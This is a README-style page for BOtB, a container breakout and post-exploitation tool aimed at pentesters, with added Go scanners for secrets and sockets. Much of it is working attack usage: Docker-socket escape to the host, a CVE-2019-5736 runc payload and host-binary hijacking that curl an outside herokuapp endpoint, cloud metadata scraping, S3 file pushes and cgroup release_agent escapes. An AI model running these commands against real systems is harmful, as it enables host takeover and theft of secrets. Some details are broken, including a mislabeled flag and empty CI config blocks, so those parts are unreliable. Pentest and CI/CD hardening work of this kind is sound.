BOtB - A Container Analysis And Exploitation Tool For Pentesters And Engineers

BOtB (Break Out The Box) is a container analysis and exploitation tool designed for use by pentesters and engineers, while also being CI/CD friendly with common CI/CD technologies.

What does it do?
BOtB is a CLI tool which lets you:

  • Exploit common container vulnerabilities
  • Perform common container post-exploitation actions
  • Provide capability when certain tools or binaries are not available in the container
  • Use BOtB's capabilities with CI/CD technologies to test container deployments
  • Perform the above in either a manual or automated way

  • … endpoints i.e. http://169.254.169.254
  • Perform a container breakout via exposed Docker daemons
  • Perform a container breakout via CVE-2019-5736
  • Hijack host binaries with a custom payload
  • Perform actions in CI/CD mode and only return exit codes > 0
  • Scrape metadata info from GCP metadata endpoints
  • Push data to an S3 bucket
  • Break out of privileged containers
  • Force BOtB to always return an exit code of 0 (useful for non-blocking CI/CD)
Getting BOtB
BOtB is available as a binary in the Releases section.

Building BOtB
BOtB is written in Go and can be built using the standard Go tools. The following can be done to get you started:

Getting the code:

    go get github.com/brompwnie/botb
    or
    git clone git@github.com:brompwnie/botb.git

Building the code:

    govendor init
    govendor add github.com/tv42/httpunix
    govendor add github.com/kr/pty
    go build -o botbsBinary

Usage
BOtB can be compiled into a binary for the targeted platform and supports the following usage:

    Usage of ./botb:
      -aggr string
            Attempt to exploit RuncPWN (default "nil")
      -always-succeed
            Attempt to scrape the GCP metadata service
      -autopwn
            Attempt to autopwn exposed sockets
      -cicd
            Attempt to autopwn but don't drop to TTY, return exit code 1 if successful else 0
      -endpointlist string
            Provide a wordlist (default "nil")
      -find-docker
            Attempt to find Dockerd
      -find-http
            Hunt for Available UNIX Domain Sockets with HTTP
      -hijack string
            Attempt to hijack binaries on host (default "nil")
      -interfaces
            Display available network interfaces
      -metadata
            Attempt to find metadata services
      -path string
            Path to Start Scanning for UNIX Domain Sockets (default "/")
      -pwn-privileged string
            Provide a command payload to try exploit --privilege CGROUP release_agent's (default "nil")
      -recon
            Perform Recon of the Container ENV
      -region string
            Provide an AWS Region e.g eu-west-2 (default "nil")
      -s3bucket string
            Provide a bucket name for S3 Push (default "nil")
      -s3push string
            Push a file to S3 e.g Full command to push to https://YOURBUCKET.s3.eu-west-2.amazonaws.com/FILENAME would be: -region eu-west-2 -s3bucket YOURBUCKET -s3push FILENAME (default "nil")
      -scrape-gcp
            Attempt to scrape the GCP metadata service
      -socket
            Hunt for Available UNIX Domain Sockets
      -verbose
            Verbose output
      -wordlist string
            Provide a wordlist (default "nil")

The following usage examples return an exit code > 0 by default when an anomaly is detected; this is shown with "echo $?", which prints the exit code of the last executed command.

Find UNIX Domain Sockets

    #./bob_linux_amd64 -socket=true
    [+] Break Out The Box
    [+] Hunting Down UNIX Domain Sockets from: /
    [!] Valid Socket: /var/meh
    [+] Finished

    #echo $?
    1

Find a Docker Daemon

    #./bob_linux_amd64 -find-docker=true
    [+] Break Out The Box
    [+] Looking for Dockerd
    [!] Dockerd DOCKER_HOST found: tcp://0.0.0.0:2375
    [+] Hunting Docker Socks
    [!] Valid Docker Socket: /var/meh
    [+] Finished

    #echo $?
    1

Break out of a Container via an Exposed Docker Daemon
This method will break out into an interactive TTY on the host.

    #./bob_linux_amd64 -autopwn=true
    [+] Break Out The Box
    [+] Attempting to autopwn
    [+] Hunting Docker Socks
    [+] Attempting to autopwn: /var/meh
    [+] Attempting to escape to host...
    [+] Attempting in TTY Mode
    ./docker/docker -H unix:///var/meh run -t -i -v /:/host alpine:latest /bin/sh
    chroot /host && clear
    echo 'You are now on the underlying host'
    You are now on the underlying host
    / #

Break out of a Container but in a CI/CD Friendly Way
This method does not break out into a TTY on the host but instead returns an exit code > 0 to indicate a successful container breakout.

    #./bob_linux_amd64 -autopwn=true -cicd=true
    [+] Break Out The Box
    [+] Attempting to autopwn
    [+] Hunting Docker Socks
    [+] Attempting to autopwn: /var/meh
    [+] Attempting to escape to host...
    [!] Successfully escaped container
    [+] Finished

    #echo $?
    1

Exploit CVE-2019-5736 with a Custom Payload
Please note that for this exploit to work, a process needs to be executed in the target container in this scenario.

    #./bob_linux_amd64 -aggr='curl "https://some.endpoint.com?command=$0&param1=$1&param2=$2">/dev/null 2>&1'
    [+] Break Out The Box
    [!] WARNING THIS OPTION IS NOT CICD FRIENDLY, THIS WILL PROBABLY BREAK THE CONTAINER RUNTIME BUT YOU MIGHT GET SHELLZ...
    [+] Attempting to exploit CVE-2019-5736 with command: curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$1&param2=$2">/dev/null 2>&1
    [+] This process will exit IF an EXECVE is called in the Container or if the Container is manually stopped
    [+] Finished

Hijack Commands/Binaries on a Host with a Custom Payload
Please note that this can be used to test whether external entities are executing commands within the container. Examples are docker exec and kubectl cp.

    #./bob_linux_amd64 -hijack='curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$1&param2=$2">/dev/null 2>&1'
    [+] Break Out The Box
    [!] WARNING THIS WILL PROBABLY BREAK THE CONTAINER BUT YOU MAY GET SHELLZ...
    [+] Attempting to hijack binaries
    [*] Command to be used: curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$1&param2=$2">/dev/null 2>&1
    [+] Currently hijacking: /bin
    [+] Currently hijacking: /sbin
    [+] Currently hijacking: /usr/bin
    [+] Finished

Analyze ENV and ProcFS Environ for Sensitive Strings
By default BOtB will search for the two words "secret" and "password".

    #./bob_linux_amd64 -recon=true
    [+] Break Out The Box
    [+] Performing Container Recon
    [+] Hunting /proc/* for data
    [!] Sensitive keyword found in: /proc/1/environ -> 'PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=0e51200113eaTERM=xtermGOLANG_VERSION=1.12.4GOPATH=/gofoo=secretpasswordHOME=/root'
    [!] Sensitive keyword found in: /proc/12/environ -> 'GOLANG_VERSION=1.12.4HOSTNAME=0e51200113eaGOPATH=/goPWD=/app/binHOME=/rootfoo=secretpasswordTERM=xtermSHLVL=1PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin_=./bob_linux_amd64OLDPWD=/bin'
    [!] Sensitive keyword found in: /proc/self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
    [!] Sensitive keyword found in: /proc/thread-self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
    [+] Checking ENV Variables for secrets
    [!] Sensitive Keyword found in ENV: foo=secretpassword
    [+] Finished

    #echo $?
    1

A wordlist can be supplied to BOtB to scan for specific keywords.

    #cat wordlist.txt
    moo

    # ./bob_linux_amd64 -recon=true -wordlist=wordlist.txt
    [+] Break Out The Box
    [+] Performing Container Recon
    [+] Hunting /proc/* for data
    [*] Loading entries from: wordlist.txt
    [+] Checking ENV Variables for secrets
    [*] Loading entries from: wordlist.txt
    [+] Finished

    # echo $?
    0
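The recon check above comes down to reading each /proc/<pid>/environ (a NUL-separated list of KEY=VALUE entries), plus the process's own environment, and searching for keywords. The Go program below is an added example written for this page, not BOtB's own code. It goes slightly beyond the output shown: it splits the blob on NUL so each matching entry is reported on its own instead of as one concatenated string, it matches case-insensitively (so DB_PASSWORD is caught as well as password), and it takes an optional wordlist path as its first argument in place of -wordlist. The exit-code convention (1 when anything is found) follows the page; the sample values in the comments are constructed.

```go
package main

import (
	"bufio"
	"bytes"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// DefaultKeywords are the two terms searched when no wordlist is supplied,
// matching the page's default behaviour.
var DefaultKeywords = []string{"secret", "password"}

// LoadWordlist reads one keyword per line, ignoring blank lines and '#' comments.
func LoadWordlist(path string) ([]string, error) {
	f, err := os.Open(path)
	if err != nil {
		return nil, err
	}
	defer f.Close()
	var words []string
	sc := bufio.NewScanner(f)
	for sc.Scan() {
		w := strings.TrimSpace(sc.Text())
		if w != "" && !strings.HasPrefix(w, "#") {
			words = append(words, w)
		}
	}
	return words, sc.Err()
}

// FindSensitive splits a NUL-separated environ blob (the /proc/<pid>/environ
// format) into KEY=VALUE entries and returns those containing any keyword.
// Matching is case-insensitive. Constructed example: the blob
// "PATH=/usr/bin\x00foo=secretpassword\x00" yields ["foo=secretpassword"].
func FindSensitive(environ []byte, keywords []string) []string {
	var hits []string
	for _, raw := range bytes.Split(environ, []byte{0}) {
		if len(raw) == 0 {
			continue
		}
		entry := string(raw)
		lower := strings.ToLower(entry)
		for _, kw := range keywords {
			if strings.Contains(lower, strings.ToLower(kw)) {
				hits = append(hits, entry)
				break
			}
		}
	}
	return hits
}

// ScanProc inspects <procRoot>/<pid>/environ for every visible process. Files
// that cannot be read (other users' processes, kernel threads) are skipped.
// procRoot is a parameter so a constructed fake procfs can be scanned in tests.
func ScanProc(procRoot string, keywords []string) map[string][]string {
	results := map[string][]string{}
	paths, _ := filepath.Glob(filepath.Join(procRoot, "[0-9]*", "environ"))
	for _, p := range paths {
		data, err := os.ReadFile(p)
		if err != nil || len(data) == 0 {
			continue
		}
		if hits := FindSensitive(data, keywords); len(hits) > 0 {
			results[p] = hits
		}
	}
	return results
}

// ScanOwnEnv applies the same check to this process's own environment.
func ScanOwnEnv(keywords []string) []string {
	return FindSensitive([]byte(strings.Join(os.Environ(), "\x00")), keywords)
}

// ExitCode follows the page's CI/CD convention: 1 when anything sensitive
// was found (fail the job), otherwise 0.
func ExitCode(procHits map[string][]string, envHits []string) int {
	if len(procHits) > 0 || len(envHits) > 0 {
		return 1
	}
	return 0
}

func main() {
	keywords := DefaultKeywords
	if len(os.Args) > 1 { // optional wordlist path, the role -wordlist plays in BOtB
		words, err := LoadWordlist(os.Args[1])
		if err != nil {
			fmt.Fprintln(os.Stderr, "[-] cannot load wordlist:", err)
			os.Exit(2)
		}
		keywords = words
	}
	procHits := ScanProc("/proc", keywords)
	for path, hits := range procHits {
		for _, h := range hits {
			fmt.Printf("[!] Sensitive keyword found in: %s -> %q\n", path, h)
		}
	}
	envHits := ScanOwnEnv(keywords)
	for _, h := range envHits {
		fmt.Printf("[!] Sensitive keyword found in ENV: %s\n", h)
	}
	os.Exit(ExitCode(procHits, envHits))
}
```

Run it with no arguments for the default keywords, or with a wordlist path (one keyword per line) to mirror the -wordlist example; inside a container it only sees the processes in its own PID namespace, which is exactly the scope the recon check is meant to cover.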

Scan for Metadata Endpoints
BOtB by default scans for two metadata endpoints.

    #  ./bob_linux_amd64 -metadata=true
    [+] Break Out The Box
    [*] Attempting to query metadata endpoint: 'http://169.254.169.254/latest/meta-data/'
    [*] Attempting to query metadata endpoint: 'http://kubernetes.default.svc/'
    [+] Finished

    # echo $?
    0

BOtB can be supplied with a list of endpoints to scan for.

    #  cat endpoints.txt
    https://heroku.com

    # ./bob_linux_amd64 -metadata=true -endpointlist=endpoints.txt
    [+] Break Out The Box
    [*] Loading entries from: endpoints.txt
    [*] Attempting to query metadata endpoint: 'https://heroku.com'
    [!] Reponse from 'https://heroku.com' -> 200
    [+] Finished

    # echo $?
    1

Get Interfaces and IPs

    #  ./bob_linux_amd64 -interfaces=true
    [+] Break Out The Box
    [+] Attempting to get local network interfaces
    [*] Got Interface: lo
    [*] Got address: 127.0.0.1/8
    [*] Got Interface: tunl0
    [*] Got Interface: ip6tnl0
    [*] Got Interface: eth0
    [*] Got address: 172.17.0.3/16
    [+] Finished

Scan for UNIX Domain Sockets that Respond to HTTP

    #  ./bob_linux_amd64 -find-http=true
    [+] Break Out The Box
    [+] Looking for HTTP enabled Sockets
    [!] Valid HTTP Socket: /var/run/docker.sock
    [+] Finished
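The three socket checks on this page (-socket, -find-docker and -find-http) share two steps: walk the filesystem for files of socket type, then try an HTTP request over each one. The Go program below is an added example written for this page, not BOtB's own code. It assumes that a Docker daemon identifies itself in the Server response header (for example "Server: Docker/19.03.8 (linux)"); that is a heuristic and is labelled as such in the code. The exit-code convention (1 when any socket is found, 0 otherwise) follows the page, so the program can be dropped into a CI job the same way.

```go
package main

import (
	"context"
	"fmt"
	"io/fs"
	"net"
	"net/http"
	"os"
	"path/filepath"
	"strings"
	"time"
)

// SocketFinding describes one UNIX domain socket discovered under the scan root.
type SocketFinding struct {
	Path       string
	SpeaksHTTP bool   // the peer returned something that parsed as an HTTP response
	Status     int    // HTTP status code when SpeaksHTTP is true
	Server     string // Server response header, used by the dockerd heuristic
}

// LooksLikeDockerd is a heuristic (an assumption, not a guarantee): the Docker
// daemon answers API requests with a header such as "Server: Docker/19.03.8 (linux)".
func (f SocketFinding) LooksLikeDockerd() bool {
	return f.SpeaksHTTP && strings.HasPrefix(f.Server, "Docker/")
}

// FindUnixSockets walks root and returns every path whose file type is socket.
// Unreadable directories (common under /proc and /sys) are skipped, not fatal.
func FindUnixSockets(root string) ([]string, error) {
	var sockets []string
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, walkErr error) error {
		if walkErr != nil {
			if d != nil && d.IsDir() {
				return fs.SkipDir
			}
			return nil
		}
		if d.Type()&fs.ModeSocket != 0 {
			sockets = append(sockets, path)
		}
		return nil
	})
	return sockets, err
}

// ProbeHTTP issues GET / over the socket. The URL host "unix" is a placeholder:
// the custom dialer ignores it and connects to socketPath instead.
func ProbeHTTP(socketPath string, timeout time.Duration) SocketFinding {
	finding := SocketFinding{Path: socketPath}
	client := &http.Client{
		Timeout: timeout,
		Transport: &http.Transport{
			DialContext: func(ctx context.Context, _, _ string) (net.Conn, error) {
				var d net.Dialer
				return d.DialContext(ctx, "unix", socketPath)
			},
		},
	}
	resp, err := client.Get("http://unix/")
	if err != nil {
		return finding // refused, timed out or not HTTP: a socket, but not an HTTP one
	}
	defer resp.Body.Close()
	finding.SpeaksHTTP = true
	finding.Status = resp.StatusCode
	finding.Server = resp.Header.Get("Server")
	return finding
}

// ScanSockets runs both steps for every socket under root.
func ScanSockets(root string, timeout time.Duration) ([]SocketFinding, error) {
	paths, err := FindUnixSockets(root)
	findings := make([]SocketFinding, 0, len(paths))
	for _, p := range paths {
		findings = append(findings, ProbeHTTP(p, timeout))
	}
	return findings, err
}

// ExitCode follows the page's CI/CD convention: any socket reachable from the
// container is an anomaly worth failing the job on.
func ExitCode(findings []SocketFinding) int {
	if len(findings) > 0 {
		return 1
	}
	return 0
}

func main() {
	root := "/" // same default as BOtB's -path
	if len(os.Args) > 1 {
		root = os.Args[1]
	}
	findings, _ := ScanSockets(root, 3*time.Second)
	for _, f := range findings {
		switch {
		case f.LooksLikeDockerd():
			fmt.Printf("[!] Docker socket: %s (%s)\n", f.Path, f.Server)
		case f.SpeaksHTTP:
			fmt.Printf("[!] HTTP socket: %s -> %d\n", f.Path, f.Status)
		default:
			fmt.Printf("[*] Socket: %s\n", f.Path)
		}
	}
	os.Exit(ExitCode(findings))
}
```

From a defender's point of view the useful output is the classification: a socket that merely exists is worth noting, one that speaks HTTP is an API surface, and one that reports a Docker Server header is the container-escape path the autopwn examples above rely on, so a mounted docker.sock should fail the deployment test rather than pass unnoticed.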

Scrape Data from the GCP Metadata Instance

    #  ./botb_linux_amd64 -scrape-gcp=true
    [+] Break Out The Box
    [+] Attempting to connect to: 169.254.169.254:80

    [*] Output->
    HTTP/1.0 200 OK
    Metadata-Flavor: Google
    Content-Type: application/text
    Date: Sun, 30 Jun 2019 21:53:41 GMT
    Server: Metadata Server for VM
    Connection: Close
    Content-Length: 21013
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN

    0.1/meta-data/attached-disks/disks/0/deviceName persistent-disk-0
    0.1/meta-data/attached-disks/disks/0/index 0
    0.1/meta-data/attached-disks/disks/0/mode READ_WRITE
    .....

Push Data to an AWS S3 Bucket

    #  ./bob_linux_amd64 -s3push=fileToPush.tar.gz -s3bucket=nameOfS3Bucket -region=eu-west-2
    [+] Break Out The Box
    [+] Pushing fileToPush.tar.gz -> nameOfS3Bucket
    [*] Data uploaded to: https://nameOfS3Bucket.s3.eu-west-2.amazonaws.com/fileToPush.tar.gz
    [+] Finished

Break out of a Privileged Container

    #  ./bob_linux_amd64 -pwn-privileged=hostname
    [+] Break Out The Box
    [+] Attempting to exploit CGROUP Privileges
    [*] The result of your command can be found in /output
    [+] Finished
    root@<container>:/app# cat /output
    docker-desktop

Force BOtB to Always Succeed with an Exit Code of 0
This is useful for non-blocking CI/CD tests.

    #  ./bob_linux_amd64 -pwn-privileged=hostname -always-succeed=true
    [+] Break Out The Box
    [+] Attempting to exploit CGROUP Privileges
    [*] The result of your command can be found in /output
    [+] Finished
    # echo $?
    0

Using BOtB with CI/CD
BOtB can be used with CI/CD technologies that use exit codes to determine whether tests have passed or failed. Below is a shell script that executes two BOtB tests and uses their exit codes to set the exit code of the script. If either of the two tests returns an exit code > 0, the script fails, and so does the CI job running it. Note that the failure of the first test is recorded before the second test runs, otherwise the second test's exit code would silently overwrite it.

    #!/bin/sh

    exitCode=0

    echo "[+] Testing UNIX Sockets"
    ./bob_linux_amd64 -autopwn -cicd=true
    [ $? -ne 0 ] && exitCode=1

    echo "[+] Testing Env"
    ./bob_linux_amd64 -recon=true
    [ $? -ne 0 ] && exitCode=1

    exit $exitCode

The above script is not the only way to use BOtB with CI/CD technologies; the binary can also be invoked on its own without a wrapper script. An example YML config would be:

    version: 2
    cicd:
      runATest: ./bob_linux_amd64 -autopwn -cicd=true

Below is an example config that can be used with Heroku CI:

    {
    "environments":
    "test":

    }

Below is an example config for Heroku CI using a wrapper shell script:

    {
    "environments":
    "test":

    }

Issues, Bugs and Improvements
For any bugs, please submit an issue. There is a long list of improvements, but please submit an issue if there is something you want to see added to BOtB.

References and Resources
This tool would not be possible without the contribution of others in the community; below is a list of resources that have helped me.

  • https://docs.docker.com/engine/security/https/
  • https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cp
  • https://docs.docker.com/engine/reference/commandline/exec/
  • https://github.com/GoogleContainerTools/container-structure-test
  • https://github.com/coreos/clair
  • https://github.com/aquasecurity/docker-bench
  • https://www.cisecurity.org/benchmark/docker/
  • https://github.com/Frichetten/CVE-2019-5736-PoC
  • https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/
  • https://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/
  • https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-classic-platform.html
  • https://github.com/wagoodman/dive
  • https://github.com/cji/talks/blob/master/BruCON2018/Outside%20The%20Box%20-%20BruCON%202018.pdf
  • https://github.com/singe/container-breakouts
  • https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/

Talks and Events
BOtB is scheduled to be presented at the following:

  • BSides London 2019 (https://sched.co/PAwB); slides can be found at https://github.com/brompwnie/bsideslondon2019
  • Black Hat Las Vegas Arsenal 2019 (https://www.blackhat.com/us-19/arsenal/agenda/index.html#break-out-the-box-botb-container-analysis-exploitation-and-cicd-tool-14988)
  • DEF CON 27 Cloud Village (https://cloud-village.org/)